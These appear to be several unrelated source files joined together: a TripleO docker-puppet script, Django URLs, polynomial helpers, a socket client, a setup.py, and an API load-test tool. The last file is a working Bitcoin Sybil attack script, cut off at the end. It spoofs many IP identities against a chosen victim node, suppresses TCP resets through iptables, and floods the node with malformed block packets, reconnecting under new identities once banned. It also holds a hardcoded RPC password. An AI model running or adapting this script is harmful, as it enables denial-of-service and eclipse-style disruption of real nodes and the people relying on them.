# License for the specific language governing permissions and limitations
# under the License.
# Shell script tool to run puppet inside of the given docker container image.
# Uses the config file at /var/lib/docker-puppet/docker-puppet.json as a source for a JSON
# array of [config_volume, puppet_tags, manifest, config_image, [volumes]] settings
# that can be used to generate config files or run ad-hoc puppet modules
# inside of a container.
import glob
import json
import logging
import os
import sys
import subprocess
import sys
import tempfile
import multiprocessing
log = logging.getLogger()
ch = logging.StreamHandler(sys.stdout)
if os.environ.get('DEBUG', False):
log.setLevel(logging.DEBUG)
ch.setLevel(logging.DEBUG)
else:
log.setLevel(logging.INFO)
ch.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s %(levelname)s: %(message)s')
ch.setFormatter(formatter)
log.addHandler(ch)
# this is to match what we do in deployed-server
def short_hostname():
subproc = subprocess.Popen(['hostname', '-s'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
cmd_stdout, cmd_stderr = subproc.communicate()
return cmd_stdout.rstrip()
def pull_image(name):
log.info('Pulling image: %s' % name)
subproc = subprocess.Popen(['/usr/bin/docker', 'pull', name],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
cmd_stdout, cmd_stderr = subproc.communicate()
if cmd_stdout:
log.debug(cmd_stdout)
if cmd_stderr:
log.debug(cmd_stderr)
def match_config_volume(prefix, config):
# Match the mounted config volume - we can't just use the
# key as e.g "novacomute" consumes config-data/nova
volumes = config.get('volumes', [])
config_volume=None
for v in volumes:
if v.startswith(prefix):
config_volume = os.path.relpath(
v.split(":")[0], prefix).split("/")[0]
break
return config_volume
def get_config_hash(prefix, config_volume):
hashfile = os.path.join(prefix, "%s.md5sum" % config_volume)
hash_data = None
if os.path.isfile(hashfile):
with open(hashfile) as f:
hash_data = f.read().rstrip()
return hash_data
def rm_container(name):
if os.environ.get('SHOW_DIFF', None):
log.info('Diffing container: %s' % name)
subproc = subprocess.Popen(['/usr/bin/docker', 'diff', name],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
cmd_stdout, cmd_stderr = subproc.communicate()
if cmd_stdout:
log.debug(cmd_stdout)
if cmd_stderr:
log.debug(cmd_stderr)
log.info('Removing container: %s' % name)
subproc = subprocess.Popen(['/usr/bin/docker', 'rm', name],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
cmd_stdout, cmd_stderr = subproc.communicate()
if cmd_stdout:
log.debug(cmd_stdout)
if cmd_stderr and \
cmd_stderr != 'Error response from daemon: ' \
'No such container: {}\n'.format(name):
log.debug(cmd_stderr)
process_count = int(os.environ.get('PROCESS_COUNT',
multiprocessing.cpu_count()))
log.info('Running docker-puppet')
config_file = os.environ.get('CONFIG', '/var/lib/docker-puppet/docker-puppet.json')
log.debug('CONFIG: %s' % config_file)
with open(config_file) as f:
json_data = json.load(f)
# To save time we support configuring 'shared' services at the same
# time. For example configuring all of the heat services
# in a single container pass makes sense and will save some time.
# To support this we merge shared settings together here.
#
# We key off of config_volume as this should be the same for a
# given group of services. We are also now specifying the container
# in which the services should be configured. This should match
# in all instances where the volume name is also the same.
configs = {}
for service in (json_data or []):
if service is None:
continue
if isinstance(service, dict):
service = [
service.get('config_volume'),
service.get('puppet_tags'),
service.get('step_config'),
service.get('config_image'),
service.get('volumes', []),
]
config_volume = service[0] or ''
puppet_tags = service[1] or ''
manifest = service[2] or ''
config_image = service[3] or ''
volumes = service[4] if len(service) > 4 else []
if not manifest or not config_image:
continue
log.info('config_volume %s' % config_volume)
log.info('puppet_tags %s' % puppet_tags)
log.info('manifest %s' % manifest)
log.info('config_image %s' % config_image)
log.info('volumes %s' % volumes)
# We key off of config volume for all configs.
if config_volume in configs:
# Append puppet tags and manifest.
log.info("Existing service, appending puppet tags and manifest")
if puppet_tags:
configs[config_volume][1] = '%s,%s' % (configs[config_volume][1],
puppet_tags)
if manifest:
configs[config_volume][2] = '%s\n%s' % (configs[config_volume][2],
manifest)
if configs[config_volume][3] != config_image:
log.warn("Config containers do not match even though"
" shared volumes are the same!")
else:
log.info("Adding new service")
configs[config_volume] = service
log.info('Service compilation completed.')
def mp_puppet_config((config_volume, puppet_tags, manifest, config_image, volumes)):
log.debug('config_volume %s' % config_volume)
log.debug('puppet_tags %s' % puppet_tags)
log.debug('manifest %s' % manifest)
log.debug('config_image %s' % config_image)
log.debug('volumes %s' % volumes)
sh_script = '/var/lib/docker-puppet/docker-puppet.sh'
with open(sh_script, 'w') as script_file:
os.chmod(script_file.name, 0755)
script_file.write("""#!/bin/bash
set -ex
mkdir -p /etc/puppet
cp -a /tmp/puppet-etc/* /etc/puppet
rm -Rf /etc/puppet/ssl # not in use and causes permission errors
echo "{\\"step\\": $STEP}" > /etc/puppet/hieradata/docker.json
TAGS=""
if [ -n "$PUPPET_TAGS" ]; then
TAGS="--tags \"$PUPPET_TAGS\""
fi
# workaround LP1696283
mkdir -p /etc/ssh
touch /etc/ssh/ssh_known_hosts
FACTER_hostname=$HOSTNAME FACTER_uuid=docker /usr/bin/puppet apply --verbose $TAGS /etc/config.pp
# Disables archiving
if [ -z "$NO_ARCHIVE" ]; then
archivedirs=("/etc" "/root" "/var/lib/ironic/tftpboot" "/var/lib/ironic/httpboot" "/var/www")
rsync_srcs=""
for d in "${archivedirs[@]}"; do
if [ -d "$d" ]; then
rsync_srcs+=" $d"
fi
done
rsync -a -R --delay-updates --delete-after $rsync_srcs /var/lib/config-data/${NAME}
# Also make a copy of files modified during puppet run
# This is useful for debugging
mkdir -p /var/lib/config-data/puppet-generated/${NAME}
rsync -a -R -0 --delay-updates --delete-after \
--files-from=<(find $rsync_srcs -newer /etc/ssh/ssh_known_hosts -print0) \
/ /var/lib/config-data/puppet-generated/${NAME}
# Write a checksum of the config-data dir, this is used as a
# salt to trigger container restart when the config changes
tar -c -f - /var/lib/config-data/${NAME} --mtime='1970-01-01' | md5sum | awk '{print $1}' > /var/lib/config-data/${NAME}.md5sum
fi
""")
with tempfile.NamedTemporaryFile() as tmp_man:
with open(tmp_man.name, 'w') as man_file:
man_file.write('include ::tripleo::packages\n')
man_file.write(manifest)
rm_container('docker-puppet-%s' % config_volume)
pull_image(config_image)
dcmd = ['/usr/bin/docker', 'run',
'--user', 'root',
'--name', 'docker-puppet-%s' % config_volume,
'--env', 'PUPPET_TAGS=%s' % puppet_tags,
'--env', 'NAME=%s' % config_volume,
'--env', 'HOSTNAME=%s' % short_hostname(),
'--env', 'NO_ARCHIVE=%s' % os.environ.get('NO_ARCHIVE', ''),
'--env', 'STEP=%s' % os.environ.get('STEP', '6'),
'--volume', '%s:/etc/config.pp:ro' % tmp_man.name,
'--volume', '/etc/puppet/:/tmp/puppet-etc/:ro',
'--volume', '/usr/share/openstack-puppet/modules/:/usr/share/openstack-puppet/modules/:ro',
'--volume', '/var/lib/config-data/:/var/lib/config-data/:rw',
'--volume', 'tripleo_logs:/var/log/tripleo/',
# OpenSSL trusted CA injection
'--volume', '/etc/pki/ca-trust/extracted:/etc/pki/ca-trust/extracted:ro',
'--volume', '/etc/pki/tls/certs/ca-bundle.crt:/etc/pki/tls/certs/ca-bundle.crt:ro',
'--volume', '/etc/pki/tls/certs/ca-bundle.trust.crt:/etc/pki/tls/certs/ca-bundle.trust.crt:ro',
'--volume', '/etc/pki/tls/cert.pem:/etc/pki/tls/cert.pem:ro',
# script injection
'--volume', '%s:%s:rw' % (sh_script, sh_script) ]
for volume in volumes:
if volume:
dcmd.extend(['--volume', volume])
dcmd.extend(['--entrypoint', sh_script])
env = {}
# NOTE(flaper87): Always copy the DOCKER_* environment variables as
# they contain the access data for the docker daemon.
for k in filter(lambda k: k.startswith('DOCKER'), os.environ.keys()):
env[k] = os.environ.get(k)
if os.environ.get('NET_HOST', 'false') == 'true':
log.debug('NET_HOST enabled')
dcmd.extend(['--net', 'host', '--volume',
'/etc/hosts:/etc/hosts:ro'])
dcmd.append(config_image)
log.debug('Running docker command: %s' % ' '.join(dcmd))
subproc = subprocess.Popen(dcmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, env=env)
cmd_stdout, cmd_stderr = subproc.communicate()
if subproc.returncode != 0:
log.error('Failed running docker-puppet.py for %s' % config_volume)
if cmd_stdout:
log.error(cmd_stdout)
if cmd_stderr:
log.error(cmd_stderr)
else:
if cmd_stdout:
log.debug(cmd_stdout)
if cmd_stderr:
log.debug(cmd_stderr)
# only delete successful runs, for debugging
rm_container('docker-puppet-%s' % config_volume)
return subproc.returncode
# Holds all the information for each process to consume.
# Instead of starting them all linearly we run them using a process
# pool. This creates a list of arguments for the above function
# to consume.
process_map = []
for config_volume in configs:
service = configs[config_volume]
puppet_tags = service[1] or ''
manifest = service[2] or ''
config_image = service[3] or ''
volumes = service[4] if len(service) > 4 else []
if puppet_tags:
puppet_tags = "file,file_line,concat,augeas,%s" % puppet_tags
else:
puppet_tags = "file,file_line,concat,augeas"
process_map.append([config_volume, puppet_tags, manifest, config_image, volumes])
for p in process_map:
log.debug('- %s' % p)
# Fire off processes to perform each configuration. Defaults
# to the number of CPUs on the system.
p = multiprocessing.Pool(process_count)
returncodes = list(p.map(mp_puppet_config, process_map))
config_volumes = [pm[0] for pm in process_map]
success = True
for returncode, config_volume in zip(returncodes, config_volumes):
if returncode != 0:
log.error('ERROR configuring %s' % config_volume)
success = False
# Update the startup configs with the config hash we generated above
config_volume_prefix = os.environ.get('CONFIG_VOLUME_PREFIX', '/var/lib/config-data')
log.debug('CONFIG_VOLUME_PREFIX: %s' % config_volume_prefix)
startup_configs = os.environ.get('STARTUP_CONFIG_PATTERN', '/var/lib/tripleo-config/docker-container-startup-config-step_*.json')
log.debug('STARTUP_CONFIG_PATTERN: %s' % startup_configs)
infiles = glob.glob('/var/lib/tripleo-config/docker-container-startup-config-step_*.json')
for infile in infiles:
with open(infile) as f:
infile_data = json.load(f)
for k, v in infile_data.iteritems():
config_volume = match_config_volume(config_volume_prefix, v)
if config_volume:
config_hash = get_config_hash(config_volume_prefix, config_volume)
if config_hash:
env = v.get('environment', [])
env.append("TRIPLEO_CONFIG_HASH=%s" % config_hash)
log.debug("Updating config hash for %s, config_volume=%s hash=%s" % (k, config_volume, config_hash))
infile_data[k]['environment'] = env
outfile = os.path.join(os.path.dirname(infile), "hashed-" + os.path.basename(infile))
with open(outfile, 'w') as out_f:
json.dump(infile_data, out_f)
if not success:
sys.exit(1)
| 39.581461 | 139 | 0.613299 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6,330 | 0.449223 |
4c237eab0c099d5c3321cd95e513399431effe30 | 668 | py | Python | TransitPass/urls.py | Savior-19/Savior19 | b80c05a19ebadf73c3d88656b7c34b761cb02f3c | [
"MIT"
] | null | null | null | TransitPass/urls.py | Savior-19/Savior19 | b80c05a19ebadf73c3d88656b7c34b761cb02f3c | [
"MIT"
] | null | null | null | TransitPass/urls.py | Savior-19/Savior19 | b80c05a19ebadf73c3d88656b7c34b761cb02f3c | [
"MIT"
] | 4 | 2020-05-27T10:02:31.000Z | 2021-07-11T08:14:20.000Z | from django.urls import path
from . import views
urlpatterns = [
path('apply/', views.FillPassApplication, name='transit-pass-application-form'),
path('application-details/<int:appln_id>', views.DisplayApplicationToken, name='application-details'),
path('view-application-list/', views.DisplayApplicationList, name='view-application-list'),
path('view-application/<int:appln_id>/', views.DisplayIndividualApplication, name='view-individual-application'),
path('check-application-status/', views.CheckApplicationStatus, name='check-application-status'),
path('check-pass-validity/', views.CheckPassValidity, name='check-pass-validity'),
] | 39.294118 | 117 | 0.754491 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 302 | 0.452096 |
4c308137f6fcaffcc096aaa674f08780ed2a8ef7 | 3,606 | py | Python | additions/irreducible_check.py | kluhan/seraphim | 412b693effb15f80d348d6d885d7c781774bb8aa | [
"MIT"
] | null | null | null | additions/irreducible_check.py | kluhan/seraphim | 412b693effb15f80d348d6d885d7c781774bb8aa | [
"MIT"
] | null | null | null | additions/irreducible_check.py | kluhan/seraphim | 412b693effb15f80d348d6d885d7c781774bb8aa | [
"MIT"
] | null | null | null | """
Irreduzibilitätskriterien
Implementiert wurden das Eisenstein- und das Perronkriterium
Quellen:
https://rms.unibuc.ro/bulletin/pdf/53-3/perron.pdf
http://math-www.uni-paderborn.de/~chris/Index33/V/par5.pdf
Übergeben werden Polynome vom Typ Polynomial, keine direkten Listen von Koeffizienten
"""
import logging
import helper
import itertools
def factor(n):
# Faktorisierung einer Zahl n
i = 0
factors = []
for i in range(1, n + 1):
if n % i == 0:
factors.append(i)
return factors
def prime_factor(n):
# Primfaktorzerlegung einer Zahl n
i = 2
factors = []
while i * i <= n:
if n % i:
i += 1
else:
n //= i
factors.append(i)
if n > 1:
factors.append(n)
return factors
# rekursive Implementierung von HCF
def hcf(x, y):
"""Highest common factor"""
if y == 0:
return x
else:
return hcf(y, x % y)
def is_polynomial_coprime(polynomial):
"""Überprüft, ob ein Polynom teilerfremd (coprime) ist"""
non_zero_polynomial = [
i for i in polynomial.coefficients if i != 0
] # Nullen würden Ergebnis von HCF verfälschen
if polynomial.degree() == 0:
return True
for x, y in itertools.combinations(non_zero_polynomial, 2):
if hcf(x, y) != 1:
return False
return True
# Quelle: https://rms.unibuc.ro/bulletin/pdf/53-3/perron.pdf
def is_irreducible_perron(polynomial):
"""
Prüft ein Polynom auf Irreduzierbarkeit (Perron).
Führender Koeffizient != 1 funktioniert nicht.
Keine Aussage möglich, wenn vorletzer Koeffizient kleiner ist als die absolute Summe der restlichen Koeffizienten
"""
if polynomial.degree() < 0:
return logging.error("Polynom ungültig")
const_coefficient = polynomial.coefficients[0]
if const_coefficient == 0:
return 0
lead_coefficient = polynomial.coefficients[polynomial.degree()]
assert lead_coefficient == 1
nm1_coefficient = abs(polynomial.coefficients[polynomial.degree() - 1])
total = 1
i = 0
for coeff in polynomial.coefficients:
if i < polynomial.degree() - 1:
total += abs(coeff)
i = i + 1
if nm1_coefficient > total:
return 1
return 2
# Quellen: https://www.uni-frankfurt.de/81429607/Stix_Algebra_SkriptWS2016_17.pdf
# http://math-www.uni-paderborn.de/~chris/Index33/V/par5.pdf
def is_irreducible_eisenstein(polynomial):
"""
Eine Implementierung des Eisensteinkriteriums.
"""
# Polynom muss einen Grad m >= 1 haben
if polynomial.degree() < 1:
return 2
# Voraussetzung für Eisenstein sind teilerfremde Koeffizienten
if helper.is_polynomial_coprime(polynomial is False):
return 2
# Prüfe, ob es eine Primzahl gibt, die alle Koeffizienten des Polynoms bis Grad m - 1 teilt. p^2 darf a0 nicht teilen
const_coeff = polynomial.coefficients[0]
if const_coeff == 0:
return 0
# Erhalte Primfaktorzerlegung der Konstante, um Grundlage von Primzahlen zu erhalten
prime_factors = helper.prime_factor(const_coeff)
for p in prime_factors:
if (
const_coeff % pow(p, 2) != 0
): # teilt p^2 den konstanten Koeffizienten, dann kann keine Aussage getroffen werden
return 2
for coeff in polynomial.coefficients[0 : polynomial.degree() - 1]:
if coeff % p != 0:
return 2 # teilt die Primzahl den Koeffizienten nicht, kann keine Aussage getroffen werden
return 1
| 27.112782 | 121 | 0.646977 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,549 | 0.428137 |
4c353955c991e91d2a8ac820fc6be7fa23bb7348 | 716 | py | Python | tools/client.py | Alisa1114/yolov4-pytorch-1 | 5dd8768f2eef868c9ee4588818350d4e1b50b98f | [
"MIT"
] | null | null | null | tools/client.py | Alisa1114/yolov4-pytorch-1 | 5dd8768f2eef868c9ee4588818350d4e1b50b98f | [
"MIT"
] | null | null | null | tools/client.py | Alisa1114/yolov4-pytorch-1 | 5dd8768f2eef868c9ee4588818350d4e1b50b98f | [
"MIT"
] | null | null | null | # -*- coding: UTF-8 -*-
from socket import *
def client():
#實驗室電腦
# serverip='120.126.151.182'
# serverport=8887
#在自己電腦測試
serverip='127.0.0.1'
serverport=8888
client=socket(AF_INET,SOCK_STREAM)
client.connect((serverip,serverport))
address_file = open('tools/address.txt', 'r')
address = address_file.read()
client.send(address.encode())
print(client.recv(1024).decode())
if __name__=='__main__':
client()
# buffer='POST /post HTTP/1.1\r\n'
# buffer+='Content-Type:application/json\r\n'
# buffer+='Body:{\\"StuId\\":\\"410785016 Chao,He-Teng\\"}\r\n'
# buffer+='Address : ' + address + '\r\n'
# buffer+='\r\n'
# print(buffer)
# message = "國立台北大學世界第一:)" | 25.571429 | 64 | 0.624302 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 410 | 0.539474 |
4c3723af9b53c7e19a14d4d5a300a57c775f6c8c | 553 | py | Python | setup.py | Lif3line/myo-helper | 7c71a3ee693661ddba0171545bf5798f46231b3c | [
"MIT"
] | null | null | null | setup.py | Lif3line/myo-helper | 7c71a3ee693661ddba0171545bf5798f46231b3c | [
"MIT"
] | null | null | null | setup.py | Lif3line/myo-helper | 7c71a3ee693661ddba0171545bf5798f46231b3c | [
"MIT"
] | null | null | null | """Utiltiy functions for working with Myo Armband data."""
from setuptools import setup, find_packages
setup(name='myo_helper',
version='0.1',
description='Utiltiy functions for working with Myo Armband data',
author='Lif3line',
author_email='adamhartwell2@gmail.com',
license='MIT',
packages=find_packages(),
url='https://github.com/Lif3line/myo_helper', # use the URL to the github repo
install_requires=[
'scipy',
'sklearn',
'numpy'
],
keywords='myo emg')
| 27.65 | 85 | 0.631103 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 272 | 0.491863 |
4c3ccdaafeb79fdce0197fde1a5c4f83054573ab | 3,338 | py | Python | a2t/src/a2t.py | syeda-khurrath/fabric8-analytics-common | 421f7e27869c5695ed73b51e6422e097aba00108 | [
"Apache-2.0"
] | null | null | null | a2t/src/a2t.py | syeda-khurrath/fabric8-analytics-common | 421f7e27869c5695ed73b51e6422e097aba00108 | [
"Apache-2.0"
] | 4 | 2019-05-20T08:27:47.000Z | 2019-05-20T08:29:57.000Z | a2t/src/a2t.py | codeready-analytics/fabric8-analytics-common | a763c5534d601f2f40a0f02c02914c49ea23669d | [
"Apache-2.0"
] | 1 | 2020-10-05T21:12:44.000Z | 2020-10-05T21:12:44.000Z | """The main module of the Analytics API Load Tests tool.
Copyright (c) 2019 Red Hat Inc.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import sys
import os
from time import time
from fastlog import log
from csv_reader import read_csv_as_dicts
from setup import setup
from cliargs import cli_parser
from component_analysis import ComponentAnalysis
from stack_analysis import StackAnalysis
from test_runner import start_tests
# current version of this tool
VERSION_MAJOR = 1
VERSION_MINOR = 0
def check_api_endpoint(api):
"""Check that some API endpoint is callable."""
log.info("Checking: core API endpoint")
with log.indent():
if not api.is_api_running():
log.error("Fatal: tested system is not available")
sys.exit(1)
else:
log.success("ok")
def check_auth_token(api):
"""Check the authorization token for the core API."""
log.info("Checking: authorization token for the core API")
with log.indent():
if api.check_auth_token_validity():
log.success("ok")
else:
log.error("Fatal: wrong token(?)")
sys.exit(1)
def check_system(api):
"""Check if all system endpoints are available and that tokens are valid."""
# try to access system endpoints
log.info("System check")
with log.indent():
check_api_endpoint(api)
check_auth_token(api)
def show_version():
"""Show A2T version."""
print("A2T version {major}.{minor}".format(major=VERSION_MAJOR, minor=VERSION_MINOR))
def main():
"""Entry point to the Analytics API Load Tests."""
log.setLevel(log.INFO)
cli_arguments = cli_parser.parse_args()
if cli_arguments.version:
show_version()
sys.exit(0)
else:
cfg = setup(cli_arguments)
coreapi_url = os.environ.get('F8A_SERVER_API_URL', None)
component_analysis = ComponentAnalysis(coreapi_url,
cfg["access_token"], cfg["user_key"], True)
stack_analysis = StackAnalysis(coreapi_url,
cfg["access_token"], cfg["user_key"], True)
check_system(component_analysis)
try:
tests = read_csv_as_dicts(cfg["input_file"])
except Exception as e:
log.error("Test description can not be read")
log.error(e)
sys.exit(0)
t1 = time()
tags = cfg["tags"]
start_tests(cfg, tests, tags, component_analysis, stack_analysis)
t2 = time()
log.info("Start time: {}".format(t1))
log.info("End time: {}".format(t2))
log.info("Duration: {}".format(t2 - t1))
if __name__ == "__main__":
# execute only if run as a script
main()
| 30.345455 | 90 | 0.65698 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,418 | 0.424805 |
4c5bad7796ac5e7201e5d6fb5312abee3b503a5c | 11,522 | py | Python | tools/Networking/sybil_block_no_ban.py | simewu/bitcoin_researcher | b9fd2efdb8ae8467c5bd4b3320713a541635df16 | [
"MIT"
] | 1 | 2020-02-15T21:44:04.000Z | 2020-02-15T21:44:04.000Z | tools/Networking/sybil_block_no_ban.py | SimeoW/bitcoin | 3644405f06c8b16a437513e8c02f0f061b91be2e | [
"MIT"
] | null | null | null | tools/Networking/sybil_block_no_ban.py | SimeoW/bitcoin | 3644405f06c8b16a437513e8c02f0f061b91be2e | [
"MIT"
] | null | null | null | from _thread import start_new_thread
from bitcoin.messages import *
from bitcoin.net import CAddress
from bitcoin.core import CBlock
from io import BytesIO as _BytesIO
import atexit
import bitcoin
import fcntl
import hashlib
import json
import os
import random
import re
import socket
import struct
import sys
import time
import datetime
if os.geteuid() != 0:
sys.exit("\nYou need to have root privileges to run this script.\nPlease try again, this time using 'sudo'. Exiting.\n")
# Specify the attacker's genuine IP
attacker_ip = input('\nEnter attacker\'s IP address: ')
# Specify the victim's IP, and port (8333 for Bitcoin)
victim_ip = input('Enter victim\'s IP address: ')
victim_port = 8333
# How many identities should run simultaneously
num_identities = 8
# While attacking the victim, wait this many seconds before sending each version message
seconds_between_version_packets = 0.1
identity_interface = [] # Keeps the IP alias interface and IP for each successful connection
identity_address = [] # Keeps the IP and port for each successful connection
identity_socket = [] # Keeps the socket for each successful connection
# The file where the iptables backup is saved, then restored when the script ends
iptables_file_path = f'{os.path.abspath(os.getcwd())}/backup.iptables.rules'
# Send commands to the Linux terminal
def terminal(cmd):
return os.popen(cmd).read()
# Send commands to the Bitcoin Core Console
def bitcoin(cmd):
return os.popen('./../../src/bitcoin-cli -rpcuser=cybersec -rpcpassword=kZIdeN4HjZ3fp9Lge4iezt0eJrbjSi8kuSuOHeUkEUbQVdf09JZXAAGwF3R5R2qQkPgoLloW91yTFuufo7CYxM2VPT7A5lYeTrodcLWWzMMwIrOKu7ZNiwkrKOQ95KGW8kIuL1slRVFXoFpGsXXTIA55V3iUYLckn8rj8MZHBpmdGQjLxakotkj83ZlSRx1aOJ4BFxdvDNz0WHk1i2OPgXL4nsd56Ph991eKNbXVJHtzqCXUbtDELVf4shFJXame -rpcport=8332 ' + cmd).read()
# Generate a random identity using the broadcast address template
def random_ip():
# By forcing the IP to be above a certain threshhold, it prevents a lot of errors
minimum_ip_range = min(int(attacker_ip.split('.')[-1]), int(victim_ip.split('.')[-1])) + 1
while(True):
ip = broadcast_address
old_ip = ''
while(old_ip != ip):
old_ip = ip
ip = ip.replace('255', str(random.randint(minimum_ip_range, 255)), 1)
# Don't accept already assigned IPs
if ip == default_gateway: continue
if ip == victim_ip: continue
if ip not in [x[0] for x in identity_address]: break
return ip
#return f'10.0.{str(random.randint(0, 255))}.{str(random.randint(0, 255))}'
# Checking the internet by sending a single ping to Google
#def internet_is_active():
# return os.system('ping -c 1 google.com') == 0
# If all else fails, we can use this to recover the network
#def reset_network():
# print('Resetting network...')
# terminal(f'sudo ifconfig {network_interface} {attacker_ip} down')
# terminal(f'sudo ifconfig {network_interface} {attacker_ip} up')
# Create an alias for a specified identity
def ip_alias(ip_address):
global alias_num
print(f'Setting up IP alias {ip_address} on {network_interface}')
interface = f'{network_interface}:{alias_num}'
terminal(f'sudo ifconfig {interface} {ip_address} netmask 255.255.255.0 broadcast {broadcast_address} up')
alias_num += 1
return interface
# Construct a block packet using python-bitcoinlib
def block_packet_bytes():
hashPrevBlock = bytearray(random.getrandbits(8) for _ in range(32))
hashMerkleRoot = bytearray(random.getrandbits(8) for _ in range(32))
nTime = int((datetime.datetime.now() - datetime.datetime(1970, 1, 1)).total_seconds())#.to_bytes(8, 'little')
nNonce = random.getrandbits(32)
msg = CBlock(
nVersion=bitcoin_protocolversion,
hashPrevBlock=hashPrevBlock,
#hashPrevBlock='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00',
hashMerkleRoot=hashMerkleRoot,
#hashMerkleRoot='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00',
nTime=nTime,
nBits=0,
nNonce=nNonce,
vtx=()
)
name = 'block'
f = _BytesIO()
msg.stream_serialize(f)
body = f.getvalue()
res = b'\xf9\xbe\xb4\xd9'
res += name.encode()
res += b"\x00" * (12 - len(name))
res += struct.pack(b"<I", len(body))
#th = hashlib.sha256(body).digest() # add checksum
#h = hashlib.sha256(th).digest()
#res += h[:4]
res += bytearray(random.getrandbits(8) for _ in range(4))
res += body
return res
# Construct a version packet using python-bitcoinlib
def version_packet(src_ip, dst_ip, src_port, dst_port):
msg = msg_version(bitcoin_protocolversion)
msg.nVersion = bitcoin_protocolversion
msg.addrFrom.ip = src_ip
msg.addrFrom.port = src_port
msg.addrTo.ip = dst_ip
msg.addrTo.port = dst_port
# Default is /python-bitcoinlib:0.11.0/
msg.strSubVer = bitcoin_subversion.encode() # Look like a normal node
return msg
# Close a connection
def close_connection(socket, ip, port, interface):
socket.close()
terminal(f'sudo ifconfig {interface} {ip} down')
if socket in identity_socket: identity_socket.remove(socket)
else: del socket
if interface in identity_interface: identity_interface.remove(interface)
if (ip, port) in identity_address: identity_address.remove((ip, port))
print(f'Successfully closed connection to ({ip} : {port})')
# Creates a fake connection to the victim
def make_fake_connection(src_ip, dst_ip, verbose=True):
src_port = random.randint(1024, 65535)
dst_port = victim_port
print(f'Creating fake identity ({src_ip} : {src_port}) to connect to ({dst_ip} : {dst_port})...')
interface = ip_alias(src_ip)
identity_interface.append(interface)
if verbose: print(f'Successfully set up IP alias on interface {interface}')
if verbose: print('Resulting ifconfig interface:')
if verbose: print(terminal(f'ifconfig {interface}').rstrip() + '\n')
if verbose: print('Setting up iptables configurations')
terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL RST,ACK -j DROP')
terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL FIN,ACK -j DROP')
terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL FIN -j DROP')
terminal(f'sudo iptables -I OUTPUT -o {interface} -p tcp --tcp-flags ALL RST -j DROP')
if verbose: print('Creating network socket...')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if verbose: print(f'Setting socket network interface to "{network_interface}"...')
success = s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, str(network_interface + '\0').encode('utf-8'))
while success == -1:
print(f'Setting socket network interface to "{network_interface}"...')
success = s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, str(network_interface + '\0').encode('utf-8'))
time.sleep(1)
print(network_interface)
if verbose: print(f'Binding socket to ({src_ip} : {src_port})...')
s.bind((src_ip, src_port))
if verbose: print(f'Connecting ({src_ip} : {src_port}) to ({dst_ip} : {dst_port})...')
try:
s.connect((dst_ip, dst_port))
except:
close_connection(s, src_ip, src_port, interface)
make_fake_connection(random_ip(), dst_ip, False)
return
# Send version packet
version = version_packet(src_ip, dst_ip, src_port, dst_port)
s.send(version.to_bytes())
# Get verack packet
verack = s.recv(1924)
# Send verack packet
verack = msg_verack(bitcoin_protocolversion)
s.send(verack.to_bytes())
# Get verack packet
verack = s.recv(1024)
if verbose: print('Connection successful!')
identity_address.append((src_ip, src_port))
identity_socket.append(s)
# Listen to the connections for future packets
if verbose: print('Attaching attacker script {interface}')
try:
start_new_thread(attack, (), {
'socket': s,
'src_ip': src_ip,
'src_port': src_port,
'dst_ip': dst_ip,
'dst_port': dst_port,
'interface': interface
})
except:
print('Error: unable to start thread to sniff interface {interface}')
# Send version repeatedly, until banned
def attack(socket, src_ip, src_port, dst_ip, dst_port, interface):
block = block_packet_bytes()
while True:
if seconds_between_version_packets != 0:
time.sleep(seconds_between_version_packets)
try:
socket.send(block)
except Exception as e:
print(e)
break
close_connection(socket, src_ip, src_port, interface)
print(f'Peer was banned ({src_ip} : {src_port})')
make_fake_connection(random_ip(), dst_ip, False)
# Initialize the network
def initialize_network_info():
print('Retrieving network info...')
global default_gateway, network_interface, broadcast_address
# Get the network interface of the default gateway
m = re.search(r'default +via +([^ ]+) +dev +([^ ]+)', terminal('ip route'))
if m != None:
default_gateway = m.group(1).strip()
network_interface = m.group(2).strip()
else:
print('Error: Network interface couldn\'t be found.')
sys.exit()
# Get the broadcast address of the network interface
# Used as an IP template of what can change, so that packets still come back to the sender
m = re.search(r'broadcast ([^ ]+)', terminal(f'ifconfig {network_interface}'))
if m != None:
broadcast_address = m.group(1).strip()
else:
print('Error: Network broadcast IP couldn\'t be found.')
sys.exit()
# Initialize Bitcoin info
def initialize_bitcoin_info():
print('Retrieving bitcoin info...')
global bitcoin_subversion
global bitcoin_protocolversion
bitcoin_subversion = '/Satoshi:0.18.0/'
bitcoin_protocolversion = 70015
try:
network_info = None #json.loads(bitcoin('getnetworkinfo'))
if 'subversion' in network_info:
bitcoin_subversion = network_info['subversion']
if 'protocolversion' in network_info:
bitcoin_protocolversion = network_info['protocolversion']
except:
pass
# Save a backyp of the iptable rules
